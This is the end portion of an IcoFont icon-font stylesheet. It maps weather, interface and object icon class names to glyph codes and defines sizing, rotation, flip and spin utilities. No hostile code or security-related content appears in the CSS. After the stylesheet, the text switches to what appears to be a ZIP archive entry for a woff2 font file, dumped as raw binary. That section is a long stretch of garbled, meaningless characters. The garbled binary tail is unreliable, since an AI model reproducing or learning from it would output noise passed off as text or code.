.icofont-snow-flake:before
{
  content: "\ee6c";
}

.icofont-snow-temp:before
{
  content: "\ee6d";
}

.icofont-snow:before
{
  content: "\ee6e";
}

.icofont-snowy-hail:before
{
  content: "\ee6f";
}

.icofont-snowy-night-hail:before
{
  content: "\ee70";
}

.icofont-snowy-night-rainy:before
{
  content: "\ee71";
}

.icofont-snowy-night:before
{
  content: "\ee72";
}

.icofont-snowy-rainy:before
{
  content: "\ee73";
}

.icofont-snowy-sunny-hail:before
{
  content: "\ee74";
}

.icofont-snowy-sunny-rainy:before
{
  content: "\ee75";
}

.icofont-snowy-sunny:before
{
  content: "\ee76";
}

.icofont-snowy-thunder-night:before
{
  content: "\ee77";
}

.icofont-snowy-thunder-sunny:before
{
  content: "\ee78";
}

.icofont-snowy-thunder:before
{
  content: "\ee79";
}

.icofont-snowy-windy-night:before
{
  content: "\ee7a";
}

.icofont-snowy-windy-sunny:before
{
  content: "\ee7b";
}

.icofont-snowy-windy:before
{
  content: "\ee7c";
}

.icofont-snowy:before
{
  content: "\ee7d";
}

.icofont-sun-alt:before
{
  content: "\ee7e";
}

.icofont-sun-rise:before
{
  content: "\ee7f";
}

.icofont-sun-set:before
{
  content: "\ee80";
}

.icofont-sun:before
{
  content: "\ee81";
}

.icofont-sunny-day-temp:before
{
  content: "\ee82";
}

.icofont-sunny:before
{
  content: "\ee83";
}

.icofont-thunder-light:before
{
  content: "\ee84";
}

.icofont-tornado:before
{
  content: "\ee85";
}

.icofont-umbrella-alt:before
{
  content: "\ee86";
}

.icofont-umbrella:before
{
  content: "\ee87";
}

.icofont-volcano:before
{
  content: "\ee88";
}

.icofont-wave:before
{
  content: "\ee89";
}

.icofont-wind-scale-0:before
{
  content: "\ee8a";
}

.icofont-wind-scale-1:before
{
  content: "\ee8b";
}

.icofont-wind-scale-10:before
{
  content: "\ee8c";
}

.icofont-wind-scale-11:before
{
  content: "\ee8d";
}

.icofont-wind-scale-12:before
{
  content: "\ee8e";
}

.icofont-wind-scale-2:before
{
  content: "\ee8f";
}

.icofont-wind-scale-3:before
{
  content: "\ee90";
}

.icofont-wind-scale-4:before
{
  content: "\ee91";
}

.icofont-wind-scale-5:before
{
  content: "\ee92";
}

.icofont-wind-scale-6:before
{
  content: "\ee93";
}

.icofont-wind-scale-7:before
{
  content: "\ee94";
}

.icofont-wind-scale-8:before
{
  content: "\ee95";
}

.icofont-wind-scale-9:before
{
  content: "\ee96";
}

.icofont-wind-waves:before
{
  content: "\ee97";
}

.icofont-wind:before
{
  content: "\ee98";
}

.icofont-windy-hail:before
{
  content: "\ee99";
}

.icofont-windy-night:before
{
  content: "\ee9a";
}

.icofont-windy-raining:before
{
  content: "\ee9b";
}

.icofont-windy-sunny:before
{
  content: "\ee9c";
}

.icofont-windy-thunder-raining:before
{
  content: "\ee9d";
}

.icofont-windy-thunder:before
{
  content: "\ee9e";
}

.icofont-windy:before
{
  content: "\ee9f";
}

.icofont-addons:before
{
  content: "\eea0";
}

.icofont-address-book:before
{
  content: "\eea1";
}

.icofont-adjust:before
{
  content: "\eea2";
}

.icofont-alarm:before
{
  content: "\eea3";
}

.icofont-anchor:before
{
  content: "\eea4";
}

.icofont-archive:before
{
  content: "\eea5";
}

.icofont-at:before
{
  content: "\eea6";
}

.icofont-attachment:before
{
  content: "\eea7";
}

.icofont-audio:before
{
  content: "\eea8";
}

.icofont-automation:before
{
  content: "\eea9";
}

.icofont-badge:before
{
  content: "\eeaa";
}

.icofont-bag-alt:before
{
  content: "\eeab";
}

.icofont-bag:before
{
  content: "\eeac";
}

.icofont-ban:before
{
  content: "\eead";
}

.icofont-bar-code:before
{
  content: "\eeae";
}

.icofont-bars:before
{
  content: "\eeaf";
}

.icofont-basket:before
{
  content: "\eeb0";
}

.icofont-battery-empty:before
{
  content: "\eeb1";
}

.icofont-battery-full:before
{
  content: "\eeb2";
}

.icofont-battery-half:before
{
  content: "\eeb3";
}

.icofont-battery-low:before
{
  content: "\eeb4";
}

.icofont-beaker:before
{
  content: "\eeb5";
}

.icofont-beard:before
{
  content: "\eeb6";
}

.icofont-bed:before
{
  content: "\eeb7";
}

.icofont-bell:before
{
  content: "\eeb8";
}

.icofont-beverage:before
{
  content: "\eeb9";
}

.icofont-bill:before
{
  content: "\eeba";
}

.icofont-bin:before
{
  content: "\eebb";
}

.icofont-binary:before
{
  content: "\eebc";
}

.icofont-binoculars:before
{
  content: "\eebd";
}

.icofont-bluetooth:before
{
  content: "\eebe";
}

.icofont-bomb:before
{
  content: "\eebf";
}

.icofont-book-mark:before
{
  content: "\eec0";
}

.icofont-box:before
{
  content: "\eec1";
}

.icofont-briefcase:before
{
  content: "\eec2";
}

.icofont-broken:before
{
  content: "\eec3";
}

.icofont-bucket:before
{
  content: "\eec4";
}

.icofont-bucket1:before
{
  content: "\eec5";
}

.icofont-bucket2:before
{
  content: "\eec6";
}

.icofont-bug:before
{
  content: "\eec7";
}

.icofont-building:before
{
  content: "\eec8";
}

.icofont-bulb-alt:before
{
  content: "\eec9";
}

.icofont-bullet:before
{
  content: "\eeca";
}

.icofont-bullhorn:before
{
  content: "\eecb";
}

.icofont-bullseye:before
{
  content: "\eecc";
}

.icofont-calendar:before
{
  content: "\eecd";
}

.icofont-camera-alt:before
{
  content: "\eece";
}

.icofont-camera:before
{
  content: "\eecf";
}

.icofont-card:before
{
  content: "\eed0";
}

.icofont-cart-alt:before
{
  content: "\eed1";
}

.icofont-cart:before
{
  content: "\eed2";
}

.icofont-cc:before
{
  content: "\eed3";
}

.icofont-charging:before
{
  content: "\eed4";
}

.icofont-chat:before
{
  content: "\eed5";
}

.icofont-check-alt:before
{
  content: "\eed6";
}

.icofont-check-circled:before
{
  content: "\eed7";
}

.icofont-check:before
{
  content: "\eed8";
}

.icofont-checked:before
{
  content: "\eed9";
}

.icofont-children-care:before
{
  content: "\eeda";
}

.icofont-clip:before
{
  content: "\eedb";
}

.icofont-clock-time:before
{
  content: "\eedc";
}

.icofont-close-circled:before
{
  content: "\eedd";
}

.icofont-close-line-circled:before
{
  content: "\eede";
}

.icofont-close-line-squared-alt:before
{
  content: "\eedf";
}

.icofont-close-line-squared:before
{
  content: "\eee0";
}

.icofont-close-line:before
{
  content: "\eee1";
}

.icofont-close-squared-alt:before
{
  content: "\eee2";
}

.icofont-close-squared:before
{
  content: "\eee3";
}

.icofont-close:before
{
  content: "\eee4";
}

.icofont-cloud-download:before
{
  content: "\eee5";
}

.icofont-cloud-refresh:before
{
  content: "\eee6";
}

.icofont-cloud-upload:before
{
  content: "\eee7";
}

.icofont-cloud:before
{
  content: "\eee8";
}

.icofont-code-not-allowed:before
{
  content: "\eee9";
}

.icofont-code:before
{
  content: "\eeea";
}

.icofont-comment:before
{
  content: "\eeeb";
}

.icofont-compass-alt:before
{
  content: "\eeec";
}

.icofont-compass:before
{
  content: "\eeed";
}

.icofont-computer:before
{
  content: "\eeee";
}

.icofont-connection:before
{
  content: "\eeef";
}

.icofont-console:before
{
  content: "\eef0";
}

.icofont-contacts:before
{
  content: "\eef1";
}

.icofont-contrast:before
{
  content: "\eef2";
}

.icofont-copyright:before
{
  content: "\eef3";
}

.icofont-credit-card:before
{
  content: "\eef4";
}

.icofont-crop:before
{
  content: "\eef5";
}

.icofont-crown:before
{
  content: "\eef6";
}

.icofont-cube:before
{
  content: "\eef7";
}

.icofont-cubes:before
{
  content: "\eef8";
}

.icofont-dashboard-web:before
{
  content: "\eef9";
}

.icofont-dashboard:before
{
  content: "\eefa";
}

.icofont-data:before
{
  content: "\eefb";
}

.icofont-database-add:before
{
  content: "\eefc";
}

.icofont-database-locked:before
{
  content: "\eefd";
}

.icofont-database-remove:before
{
  content: "\eefe";
}

.icofont-database:before
{
  content: "\eeff";
}

.icofont-delete:before
{
  content: "\ef00";
}

.icofont-diamond:before
{
  content: "\ef01";
}

.icofont-dice-multiple:before
{
  content: "\ef02";
}

.icofont-dice:before
{
  content: "\ef03";
}

.icofont-disc:before
{
  content: "\ef04";
}

.icofont-diskette:before
{
  content: "\ef05";
}

.icofont-document-folder:before
{
  content: "\ef06";
}

.icofont-download-alt:before
{
  content: "\ef07";
}

.icofont-download:before
{
  content: "\ef08";
}

.icofont-downloaded:before
{
  content: "\ef09";
}

.icofont-drag:before
{
  content: "\ef0a";
}

.icofont-drag1:before
{
  content: "\ef0b";
}

.icofont-drag2:before
{
  content: "\ef0c";
}

.icofont-drag3:before
{
  content: "\ef0d";
}

.icofont-earth:before
{
  content: "\ef0e";
}

.icofont-ebook:before
{
  content: "\ef0f";
}

.icofont-edit:before
{
  content: "\ef10";
}

.icofont-eject:before
{
  content: "\ef11";
}

.icofont-email:before
{
  content: "\ef12";
}

.icofont-envelope-open:before
{
  content: "\ef13";
}

.icofont-envelope:before
{
  content: "\ef14";
}

.icofont-eraser:before
{
  content: "\ef15";
}

.icofont-error:before
{
  content: "\ef16";
}

.icofont-excavator:before
{
  content: "\ef17";
}

.icofont-exchange:before
{
  content: "\ef18";
}

.icofont-exclamation-circle:before
{
  content: "\ef19";
}

.icofont-exclamation-square:before
{
  content: "\ef1a";
}

.icofont-exclamation-tringle:before
{
  content: "\ef1b";
}

.icofont-exclamation:before
{
  content: "\ef1c";
}

.icofont-exit:before
{
  content: "\ef1d";
}

.icofont-expand:before
{
  content: "\ef1e";
}

.icofont-external-link:before
{
  content: "\ef1f";
}

.icofont-external:before
{
  content: "\ef20";
}

.icofont-eye-alt:before
{
  content: "\ef21";
}

.icofont-eye-blocked:before
{
  content: "\ef22";
}

.icofont-eye-dropper:before
{
  content: "\ef23";
}

.icofont-eye:before
{
  content: "\ef24";
}

.icofont-favourite:before
{
  content: "\ef25";
}

.icofont-fax:before
{
  content: "\ef26";
}

.icofont-file-fill:before
{
  content: "\ef27";
}

.icofont-film:before
{
  content: "\ef28";
}

.icofont-filter:before
{
  content: "\ef29";
}

.icofont-fire-alt:before
{
  content: "\ef2a";
}

.icofont-fire-burn:before
{
  content: "\ef2b";
}

.icofont-fire:before
{
  content: "\ef2c";
}

.icofont-flag-alt-1:before
{
  content: "\ef2d";
}

.icofont-flag-alt-2:before
{
  content: "\ef2e";
}

.icofont-flag:before
{
  content: "\ef2f";
}

.icofont-flame-torch:before
{
  content: "\ef30";
}

.icofont-flash-light:before
{
  content: "\ef31";
}

.icofont-flash:before
{
  content: "\ef32";
}

.icofont-flask:before
{
  content: "\ef33";
}

.icofont-focus:before
{
  content: "\ef34";
}

.icofont-folder-open:before
{
  content: "\ef35";
}

.icofont-folder:before
{
  content: "\ef36";
}

.icofont-foot-print:before
{
  content: "\ef37";
}

.icofont-garbage:before
{
  content: "\ef38";
}

.icofont-gear-alt:before
{
  content: "\ef39";
}

.icofont-gear:before
{
  content: "\ef3a";
}

.icofont-gears:before
{
  content: "\ef3b";
}

.icofont-gift:before
{
  content: "\ef3c";
}

.icofont-glass:before
{
  content: "\ef3d";
}

.icofont-globe:before
{
  content: "\ef3e";
}

.icofont-graffiti:before
{
  content: "\ef3f";
}

.icofont-grocery:before
{
  content: "\ef40";
}

.icofont-hand:before
{
  content: "\ef41";
}

.icofont-hanger:before
{
  content: "\ef42";
}

.icofont-hard-disk:before
{
  content: "\ef43";
}

.icofont-heart-alt:before
{
  content: "\ef44";
}

.icofont-heart:before
{
  content: "\ef45";
}

.icofont-history:before
{
  content: "\ef46";
}

.icofont-home:before
{
  content: "\ef47";
}

.icofont-horn:before
{
  content: "\ef48";
}

.icofont-hour-glass:before
{
  content: "\ef49";
}

.icofont-id:before
{
  content: "\ef4a";
}

.icofont-image:before
{
  content: "\ef4b";
}

.icofont-inbox:before
{
  content: "\ef4c";
}

.icofont-infinite:before
{
  content: "\ef4d";
}

.icofont-info-circle:before
{
  content: "\ef4e";
}

.icofont-info-square:before
{
  content: "\ef4f";
}

.icofont-info:before
{
  content: "\ef50";
}

.icofont-institution:before
{
  content: "\ef51";
}

.icofont-interface:before
{
  content: "\ef52";
}

.icofont-invisible:before
{
  content: "\ef53";
}

.icofont-jacket:before
{
  content: "\ef54";
}

.icofont-jar:before
{
  content: "\ef55";
}

.icofont-jewlery:before
{
  content: "\ef56";
}

.icofont-karate:before
{
  content: "\ef57";
}

.icofont-key-hole:before
{
  content: "\ef58";
}

.icofont-key:before
{
  content: "\ef59";
}

.icofont-label:before
{
  content: "\ef5a";
}

.icofont-lamp:before
{
  content: "\ef5b";
}

.icofont-layers:before
{
  content: "\ef5c";
}

.icofont-layout:before
{
  content: "\ef5d";
}

.icofont-leaf:before
{
  content: "\ef5e";
}

.icofont-leaflet:before
{
  content: "\ef5f";
}

.icofont-learn:before
{
  content: "\ef60";
}

.icofont-lego:before
{
  content: "\ef61";
}

.icofont-lens:before
{
  content: "\ef62";
}

.icofont-letter:before
{
  content: "\ef63";
}

.icofont-letterbox:before
{
  content: "\ef64";
}

.icofont-library:before
{
  content: "\ef65";
}

.icofont-license:before
{
  content: "\ef66";
}

.icofont-life-bouy:before
{
  content: "\ef67";
}

.icofont-life-buoy:before
{
  content: "\ef68";
}

.icofont-life-jacket:before
{
  content: "\ef69";
}

.icofont-life-ring:before
{
  content: "\ef6a";
}

.icofont-light-bulb:before
{
  content: "\ef6b";
}

.icofont-lighter:before
{
  content: "\ef6c";
}

.icofont-lightning-ray:before
{
  content: "\ef6d";
}

.icofont-like:before
{
  content: "\ef6e";
}

.icofont-line-height:before
{
  content: "\ef6f";
}

.icofont-link-alt:before
{
  content: "\ef70";
}

.icofont-link:before
{
  content: "\ef71";
}

.icofont-list:before
{
  content: "\ef72";
}

.icofont-listening:before
{
  content: "\ef73";
}

.icofont-listine-dots:before
{
  content: "\ef74";
}

.icofont-listing-box:before
{
  content: "\ef75";
}

.icofont-listing-number:before
{
  content: "\ef76";
}

.icofont-live-support:before
{
  content: "\ef77";
}

.icofont-location-arrow:before
{
  content: "\ef78";
}

.icofont-location-pin:before
{
  content: "\ef79";
}

.icofont-lock:before
{
  content: "\ef7a";
}

.icofont-login:before
{
  content: "\ef7b";
}

.icofont-logout:before
{
  content: "\ef7c";
}

.icofont-lollipop:before
{
  content: "\ef7d";
}

.icofont-long-drive:before
{
  content: "\ef7e";
}

.icofont-look:before
{
  content: "\ef7f";
}

.icofont-loop:before
{
  content: "\ef80";
}

.icofont-luggage:before
{
  content: "\ef81";
}

.icofont-lunch:before
{
  content: "\ef82";
}

.icofont-lungs:before
{
  content: "\ef83";
}

.icofont-magic-alt:before
{
  content: "\ef84";
}

.icofont-magic:before
{
  content: "\ef85";
}

.icofont-magnet:before
{
  content: "\ef86";
}

.icofont-mail-box:before
{
  content: "\ef87";
}

.icofont-mail:before
{
  content: "\ef88";
}

.icofont-male:before
{
  content: "\ef89";
}

.icofont-map-pins:before
{
  content: "\ef8a";
}

.icofont-map:before
{
  content: "\ef8b";
}

.icofont-maximize:before
{
  content: "\ef8c";
}

.icofont-measure:before
{
  content: "\ef8d";
}

.icofont-medicine:before
{
  content: "\ef8e";
}

.icofont-mega-phone:before
{
  content: "\ef8f";
}

.icofont-megaphone-alt:before
{
  content: "\ef90";
}

.icofont-megaphone:before
{
  content: "\ef91";
}

.icofont-memorial:before
{
  content: "\ef92";
}

.icofont-memory-card:before
{
  content: "\ef93";
}

.icofont-mic-mute:before
{
  content: "\ef94";
}

.icofont-mic:before
{
  content: "\ef95";
}

.icofont-military:before
{
  content: "\ef96";
}

.icofont-mill:before
{
  content: "\ef97";
}

.icofont-minus-circle:before
{
  content: "\ef98";
}

.icofont-minus-square:before
{
  content: "\ef99";
}

.icofont-minus:before
{
  content: "\ef9a";
}

.icofont-mobile-phone:before
{
  content: "\ef9b";
}

.icofont-molecule:before
{
  content: "\ef9c";
}

.icofont-money:before
{
  content: "\ef9d";
}

.icofont-moon:before
{
  content: "\ef9e";
}

.icofont-mop:before
{
  content: "\ef9f";
}

.icofont-muffin:before
{
  content: "\efa0";
}

.icofont-mustache:before
{
  content: "\efa1";
}

.icofont-navigation-menu:before
{
  content: "\efa2";
}

.icofont-navigation:before
{
  content: "\efa3";
}

.icofont-network-tower:before
{
  content: "\efa4";
}

.icofont-network:before
{
  content: "\efa5";
}

.icofont-news:before
{
  content: "\efa6";
}

.icofont-newspaper:before
{
  content: "\efa7";
}

.icofont-no-smoking:before
{
  content: "\efa8";
}

.icofont-not-allowed:before
{
  content: "\efa9";
}

.icofont-notebook:before
{
  content: "\efaa";
}

.icofont-notepad:before
{
  content: "\efab";
}

.icofont-notification:before
{
  content: "\efac";
}

.icofont-numbered:before
{
  content: "\efad";
}

.icofont-opposite:before
{
  content: "\efae";
}

.icofont-optic:before
{
  content: "\efaf";
}

.icofont-options:before
{
  content: "\efb0";
}

.icofont-package:before
{
  content: "\efb1";
}

.icofont-page:before
{
  content: "\efb2";
}

.icofont-paint:before
{
  content: "\efb3";
}

.icofont-paper-plane:before
{
  content: "\efb4";
}

.icofont-paperclip:before
{
  content: "\efb5";
}

.icofont-papers:before
{
  content: "\efb6";
}

.icofont-pay:before
{
  content: "\efb7";
}

.icofont-penguin-linux:before
{
  content: "\efb8";
}

.icofont-pestle:before
{
  content: "\efb9";
}

.icofont-phone-circle:before
{
  content: "\efba";
}

.icofont-phone:before
{
  content: "\efbb";
}

.icofont-picture:before
{
  content: "\efbc";
}

.icofont-pine:before
{
  content: "\efbd";
}

.icofont-pixels:before
{
  content: "\efbe";
}

.icofont-plugin:before
{
  content: "\efbf";
}

.icofont-plus-circle:before
{
  content: "\efc0";
}

.icofont-plus-square:before
{
  content: "\efc1";
}

.icofont-plus:before
{
  content: "\efc2";
}

.icofont-polygonal:before
{
  content: "\efc3";
}

.icofont-power:before
{
  content: "\efc4";
}

.icofont-price:before
{
  content: "\efc5";
}

.icofont-print:before
{
  content: "\efc6";
}

.icofont-puzzle:before
{
  content: "\efc7";
}

.icofont-qr-code:before
{
  content: "\efc8";
}

.icofont-queen:before
{
  content: "\efc9";
}

.icofont-question-circle:before
{
  content: "\efca";
}

.icofont-question-square:before
{
  content: "\efcb";
}

.icofont-question:before
{
  content: "\efcc";
}

.icofont-quote-left:before
{
  content: "\efcd";
}

.icofont-quote-right:before
{
  content: "\efce";
}

.icofont-random:before
{
  content: "\efcf";
}

.icofont-recycle:before
{
  content: "\efd0";
}

.icofont-refresh:before
{
  content: "\efd1";
}

.icofont-repair:before
{
  content: "\efd2";
}

.icofont-reply-all:before
{
  content: "\efd3";
}

.icofont-reply:before
{
  content: "\efd4";
}

.icofont-resize:before
{
  content: "\efd5";
}

.icofont-responsive:before
{
  content: "\efd6";
}

.icofont-retweet:before
{
  content: "\efd7";
}

.icofont-road:before
{
  content: "\efd8";
}

.icofont-robot:before
{
  content: "\efd9";
}

.icofont-royal:before
{
  content: "\efda";
}

.icofont-rss-feed:before
{
  content: "\efdb";
}

.icofont-safety:before
{
  content: "\efdc";
}

.icofont-sale-discount:before
{
  content: "\efdd";
}

.icofont-satellite:before
{
  content: "\efde";
}

.icofont-send-mail:before
{
  content: "\efdf";
}

.icofont-server:before
{
  content: "\efe0";
}

.icofont-settings-alt:before
{
  content: "\efe1";
}

.icofont-settings:before
{
  content: "\efe2";
}

.icofont-share-alt:before
{
  content: "\efe3";
}

.icofont-share-boxed:before
{
  content: "\efe4";
}

.icofont-share:before
{
  content: "\efe5";
}

.icofont-shield:before
{
  content: "\efe6";
}

.icofont-shopping-cart:before
{
  content: "\efe7";
}

.icofont-sign-in:before
{
  content: "\efe8";
}

.icofont-sign-out:before
{
  content: "\efe9";
}

.icofont-signal:before
{
  content: "\efea";
}

.icofont-site-map:before
{
  content: "\efeb";
}

.icofont-smart-phone:before
{
  content: "\efec";
}

.icofont-soccer:before
{
  content: "\efed";
}

.icofont-sort-alt:before
{
  content: "\efee";
}

.icofont-sort:before
{
  content: "\efef";
}

.icofont-space:before
{
  content: "\eff0";
}

.icofont-spanner:before
{
  content: "\eff1";
}

.icofont-speech-comments:before
{
  content: "\eff2";
}

.icofont-speed-meter:before
{
  content: "\eff3";
}

.icofont-spinner-alt-1:before
{
  content: "\eff4";
}

.icofont-spinner-alt-2:before
{
  content: "\eff5";
}

.icofont-spinner-alt-3:before
{
  content: "\eff6";
}

.icofont-spinner-alt-4:before
{
  content: "\eff7";
}

.icofont-spinner-alt-5:before
{
  content: "\eff8";
}

.icofont-spinner-alt-6:before
{
  content: "\eff9";
}

.icofont-spinner:before
{
  content: "\effa";
}

.icofont-spreadsheet:before
{
  content: "\effb";
}

.icofont-square:before
{
  content: "\effc";
}

.icofont-ssl-security:before
{
  content: "\effd";
}

.icofont-star-alt-1:before
{
  content: "\effe";
}

.icofont-star-alt-2:before
{
  content: "\efff";
}

.icofont-star:before
{
  content: "\f000";
}

.icofont-street-view:before
{
  content: "\f001";
}

.icofont-support-faq:before
{
  content: "\f002";
}

.icofont-tack-pin:before
{
  content: "\f003";
}

.icofont-tag:before
{
  content: "\f004";
}

.icofont-tags:before
{
  content: "\f005";
}

.icofont-tasks-alt:before
{
  content: "\f006";
}

.icofont-tasks:before
{
  content: "\f007";
}

.icofont-telephone:before
{
  content: "\f008";
}

.icofont-telescope:before
{
  content: "\f009";
}

.icofont-terminal:before
{
  content: "\f00a";
}

.icofont-thumbs-down:before
{
  content: "\f00b";
}

.icofont-thumbs-up:before
{
  content: "\f00c";
}

.icofont-tick-boxed:before
{
  content: "\f00d";
}

.icofont-tick-mark:before
{
  content: "\f00e";
}

.icofont-ticket:before
{
  content: "\f00f";
}

.icofont-tie:before
{
  content: "\f010";
}

.icofont-toggle-off:before
{
  content: "\f011";
}

.icofont-toggle-on:before
{
  content: "\f012";
}

.icofont-tools-alt-2:before
{
  content: "\f013";
}

.icofont-tools:before
{
  content: "\f014";
}

.icofont-touch:before
{
  content: "\f015";
}

.icofont-traffic-light:before
{
  content: "\f016";
}

.icofont-transparent:before
{
  content: "\f017";
}

.icofont-tree:before
{
  content: "\f018";
}

.icofont-unique-idea:before
{
  content: "\f019";
}

.icofont-unlock:before
{
  content: "\f01a";
}

.icofont-unlocked:before
{
  content: "\f01b";
}

.icofont-upload-alt:before
{
  content: "\f01c";
}

.icofont-upload:before
{
  content: "\f01d";
}

.icofont-usb-drive:before
{
  content: "\f01e";
}

.icofont-usb:before
{
  content: "\f01f";
}

.icofont-vector-path:before
{
  content: "\f020";
}

.icofont-verification-check:before
{
  content: "\f021";
}

.icofont-wall-clock:before
{
  content: "\f022";
}

.icofont-wall:before
{
  content: "\f023";
}

.icofont-wallet:before
{
  content: "\f024";
}

.icofont-warning-alt:before
{
  content: "\f025";
}

.icofont-warning:before
{
  content: "\f026";
}

.icofont-water-drop:before
{
  content: "\f027";
}

.icofont-web:before
{
  content: "\f028";
}

.icofont-wheelchair:before
{
  content: "\f029";
}

.icofont-wifi-alt:before
{
  content: "\f02a";
}

.icofont-wifi:before
{
  content: "\f02b";
}

.icofont-world:before
{
  content: "\f02c";
}

.icofont-zigzag:before
{
  content: "\f02d";
}

.icofont-zipped:before
{
  content: "\f02e";
}

.icofont-xs
{
  font-size: .5em;
}

.icofont-sm
{
  font-size: .75em;
}

.icofont-md
{
  font-size: 1.25em;
}

.icofont-lg
{
  font-size: 1.5em;
}

.icofont-1x
{
  font-size: 1em;
}

.icofont-2x
{
  font-size: 2em;
}

.icofont-3x
{
  font-size: 3em;
}

.icofont-4x
{
  font-size: 4em;
}

.icofont-5x
{
  font-size: 5em;
}

.icofont-6x
{
  font-size: 6em;
}

.icofont-7x
{
  font-size: 7em;
}

.icofont-8x
{
  font-size: 8em;
}

.icofont-9x
{
  font-size: 9em;
}

.icofont-10x
{
  font-size: 10em;
}

.icofont-fw
{
  text-align: center;
  width: 1.25em;
}

.icofont-ul
{
  list-style-type: none;
  padding-left: 0;
  margin-left: 0;
}

.icofont-ul > li
{
  position: relative;
  line-height: 2em;
}

.icofont-ul > li .icofont
{
  display: inline-block;
  vertical-align: middle;
}

.icofont-border
{
  border: solid 0.08em #f1f1f1;
  border-radius: .1em;
  padding: .2em .25em .15em;
}

.icofont-pull-left
{
  float: left;
}

.icofont-pull-right
{
  float: right;
}

.icofont.icofont-pull-left
{
  margin-right: .3em;
}

.icofont.icofont-pull-right
{
  margin-left: .3em;
}

.icofont-spin
{
  -webkit-animation: icofont-spin 2s infinite linear;
  animation: icofont-spin 2s infinite linear;
  display: inline-block;
}

.icofont-pulse
{
  -webkit-animation: icofont-spin 1s infinite steps(8);
  animation: icofont-spin 1s infinite steps(8);
  display: inline-block;
}

@-webkit-keyframes icofont-spin
{
  0%
  {
    -webkit-transform: rotate(0deg);
    transform: rotate(0deg);
  }

  100%
  {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes icofont-spin
{
  0%
  {
    -webkit-transform: rotate(0deg);
    transform: rotate(0deg);
  }

  100%
  {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

.icofont-rotate-90
{
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";
  -webkit-transform: rotate(90deg);
  transform: rotate(90deg);
}

.icofont-rotate-180
{
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";
  -webkit-transform: rotate(180deg);
  transform: rotate(180deg);
}

.icofont-rotate-270
{
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";
  -webkit-transform: rotate(270deg);
  transform: rotate(270deg);
}

.icofont-flip-horizontal
{
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";
  -webkit-transform: scale(-1, 1);
  transform: scale(-1, 1);
}

.icofont-flip-vertical
{
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";
  -webkit-transform: scale(1, -1);
  transform: scale(1, -1);
}

.icofont-flip-horizontal.icofont-flip-vertical
{
  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";
  -webkit-transform: scale(-1, -1);
  transform: scale(-1, -1);
}

:root .icofont-rotate-90,
	:root .icofont-rotate-180,
	:root .icofont-rotate-270,
	:root .icofont-flip-horizontal,
	:root .icofont-flip-vertical
{
  -webkit-filter: none;
  filter: none;
  display: inline-block;
}

.icofont-inverse
{
  color: #fff;
}

.sr-only
{
  border: 0;
  clip: rect(0, 0, 0, 0);
  height: 1px;
  margin: -1px;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}

.sr-only-focusable:active,
	.sr-only-focusable:focus
{
  clip: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  position: static;
  width: auto;
}
	PK!�dQ55icofont/fonts/icofont.woff2nu&1i�wOF25��4�TV��t
�� ��M6$�8�< �
��O[�2��N�w�+�Ф9���&{U��v��Ķa�	Y����S�@t���9Pul��x�HJ��V�R��������������d�sv-��tw��<��'�J��RhIkI�
�2!��	���=�ԍ���o��5�@�Չ�6�'iN��Y㦗�%x�X.�.q�vp�67��y���w�����7���y�,C�cl��bn���2;9b�Z�)�{�V�������r<Wn��Z�^����Zk��s[k�a��G�ÿq���k�
ut�֚]O(�_�@w�
W����ӽ�h?�G���8�{�����%���}�<8�g�_8xp0�%�bvv{����9�7_O���=�����d�Q�����v��Ɠ���S��A#�oS���a�O���0eui��j�0�+m�ݘ.z�6Gfj�[3��ʄ�⇑��bB�c����]s����ґ�a5���6�,����p\������j��&���%T�S�a�ʜl��#A�z��KIF���:U�7�v]dI�2�R�X":"�Q$�9Ю񦠡��2a��L�{�D�a��N��"6��@��3Z��|Og.3�&��A3�KBIj�@3�$��`cH�ArI�|#٦C	�N۞����,v�t?�}�]�Y"q�wǑ\dMҭ���w��4������8�@2t6����͌9��,�]�+B(u��r��r8g�e�d���pQPׂBf��E�,q��D"�Q�=B�1u�e��{e��(�!T2���&�	ۻ�lL{��4�s���~�i��=�?�����'w9��K��,D����A��I-T��Q�!9���y?���K:��ч��OV���{�jLV�g��cq�6B!)Ǔ�)ow����{�Sq�ݻS��ٽ�I��;�$7��I�\A�66U�\q�!�2�'����
�&��SHB+)��I ?�ùj0I�#&�J	m>����{����5!zI��J�#��(m���](��M{΅�r��+]�p�\��Z�w�Q��I��ӂ�
���A>eJ�`b�	X�nbOa��M�Y�����TQ碌u��ʨl7����~�O�zu���6^Q�+h�=�~�Q����+�^b����PWam�s�_�*�Y�]��RH
Q��i�����{��2��]
��7�BSj���J��G`y��G�#�:¤;��G!9�d�펾�5�͢���Yf�vw�`�_adlC����R���{�j��6�qNfw�`���Im�
��D��X3c�?ݿݿ�j7��
I:��J�֒��L���R,��}�1�z�ݦQ��-Y��1�,,��H
�¢12D���Q8�l'���~��Y�l@:��!<�w����~��_�n�X�բ�}�-�EB�`��2F�n-�
=@D��$TLB�L����
h�U��S�:��D���K�����`x����.�}�*��]�]��E[G���v:�*ur`�����a�ne�����v,�
	Ut�s]�aS��N`	Џ?��SM�$�Ģ5����[�j�K7�P�e��|���w���;8ݹ|��\>`	[[�����F����@mP�s�u�L3yp^ȟ|9|`���
2Bڗ���eA.P�d���S���ޒ���  ےeؒ!���xuo���)�m��t�{���,�r!0�	7�4q�†@DA��6���B���z��z���;��(�Ԛg�l�ݝ��]ippw��p�Q�z��"���~E;Xj>5F�1����1j4���)�f�1��nZu�����5���{f6+�-�V@����H�Fp�5?�M����y�Ҍ-D��8�}$(<,p��_�ν�@A`ˁB�m�[�ݵe��U_0����{3��Ē[������s�O�w��72�K�)�V��?U�5F���g�
�آ-�ZiSp�.�	�E�h[��6������yO�䭈 �̰!å.������[��T�MRvU�D[r��C��[a�=�a�F��3cI��[g&��N�vݿ��[{�n����@���̒l�lٖ���w���4�FI�@#m��P)ФI;)�v�,w����W��3#���dJr�ks�������OrO��
���CC���m7�!�v
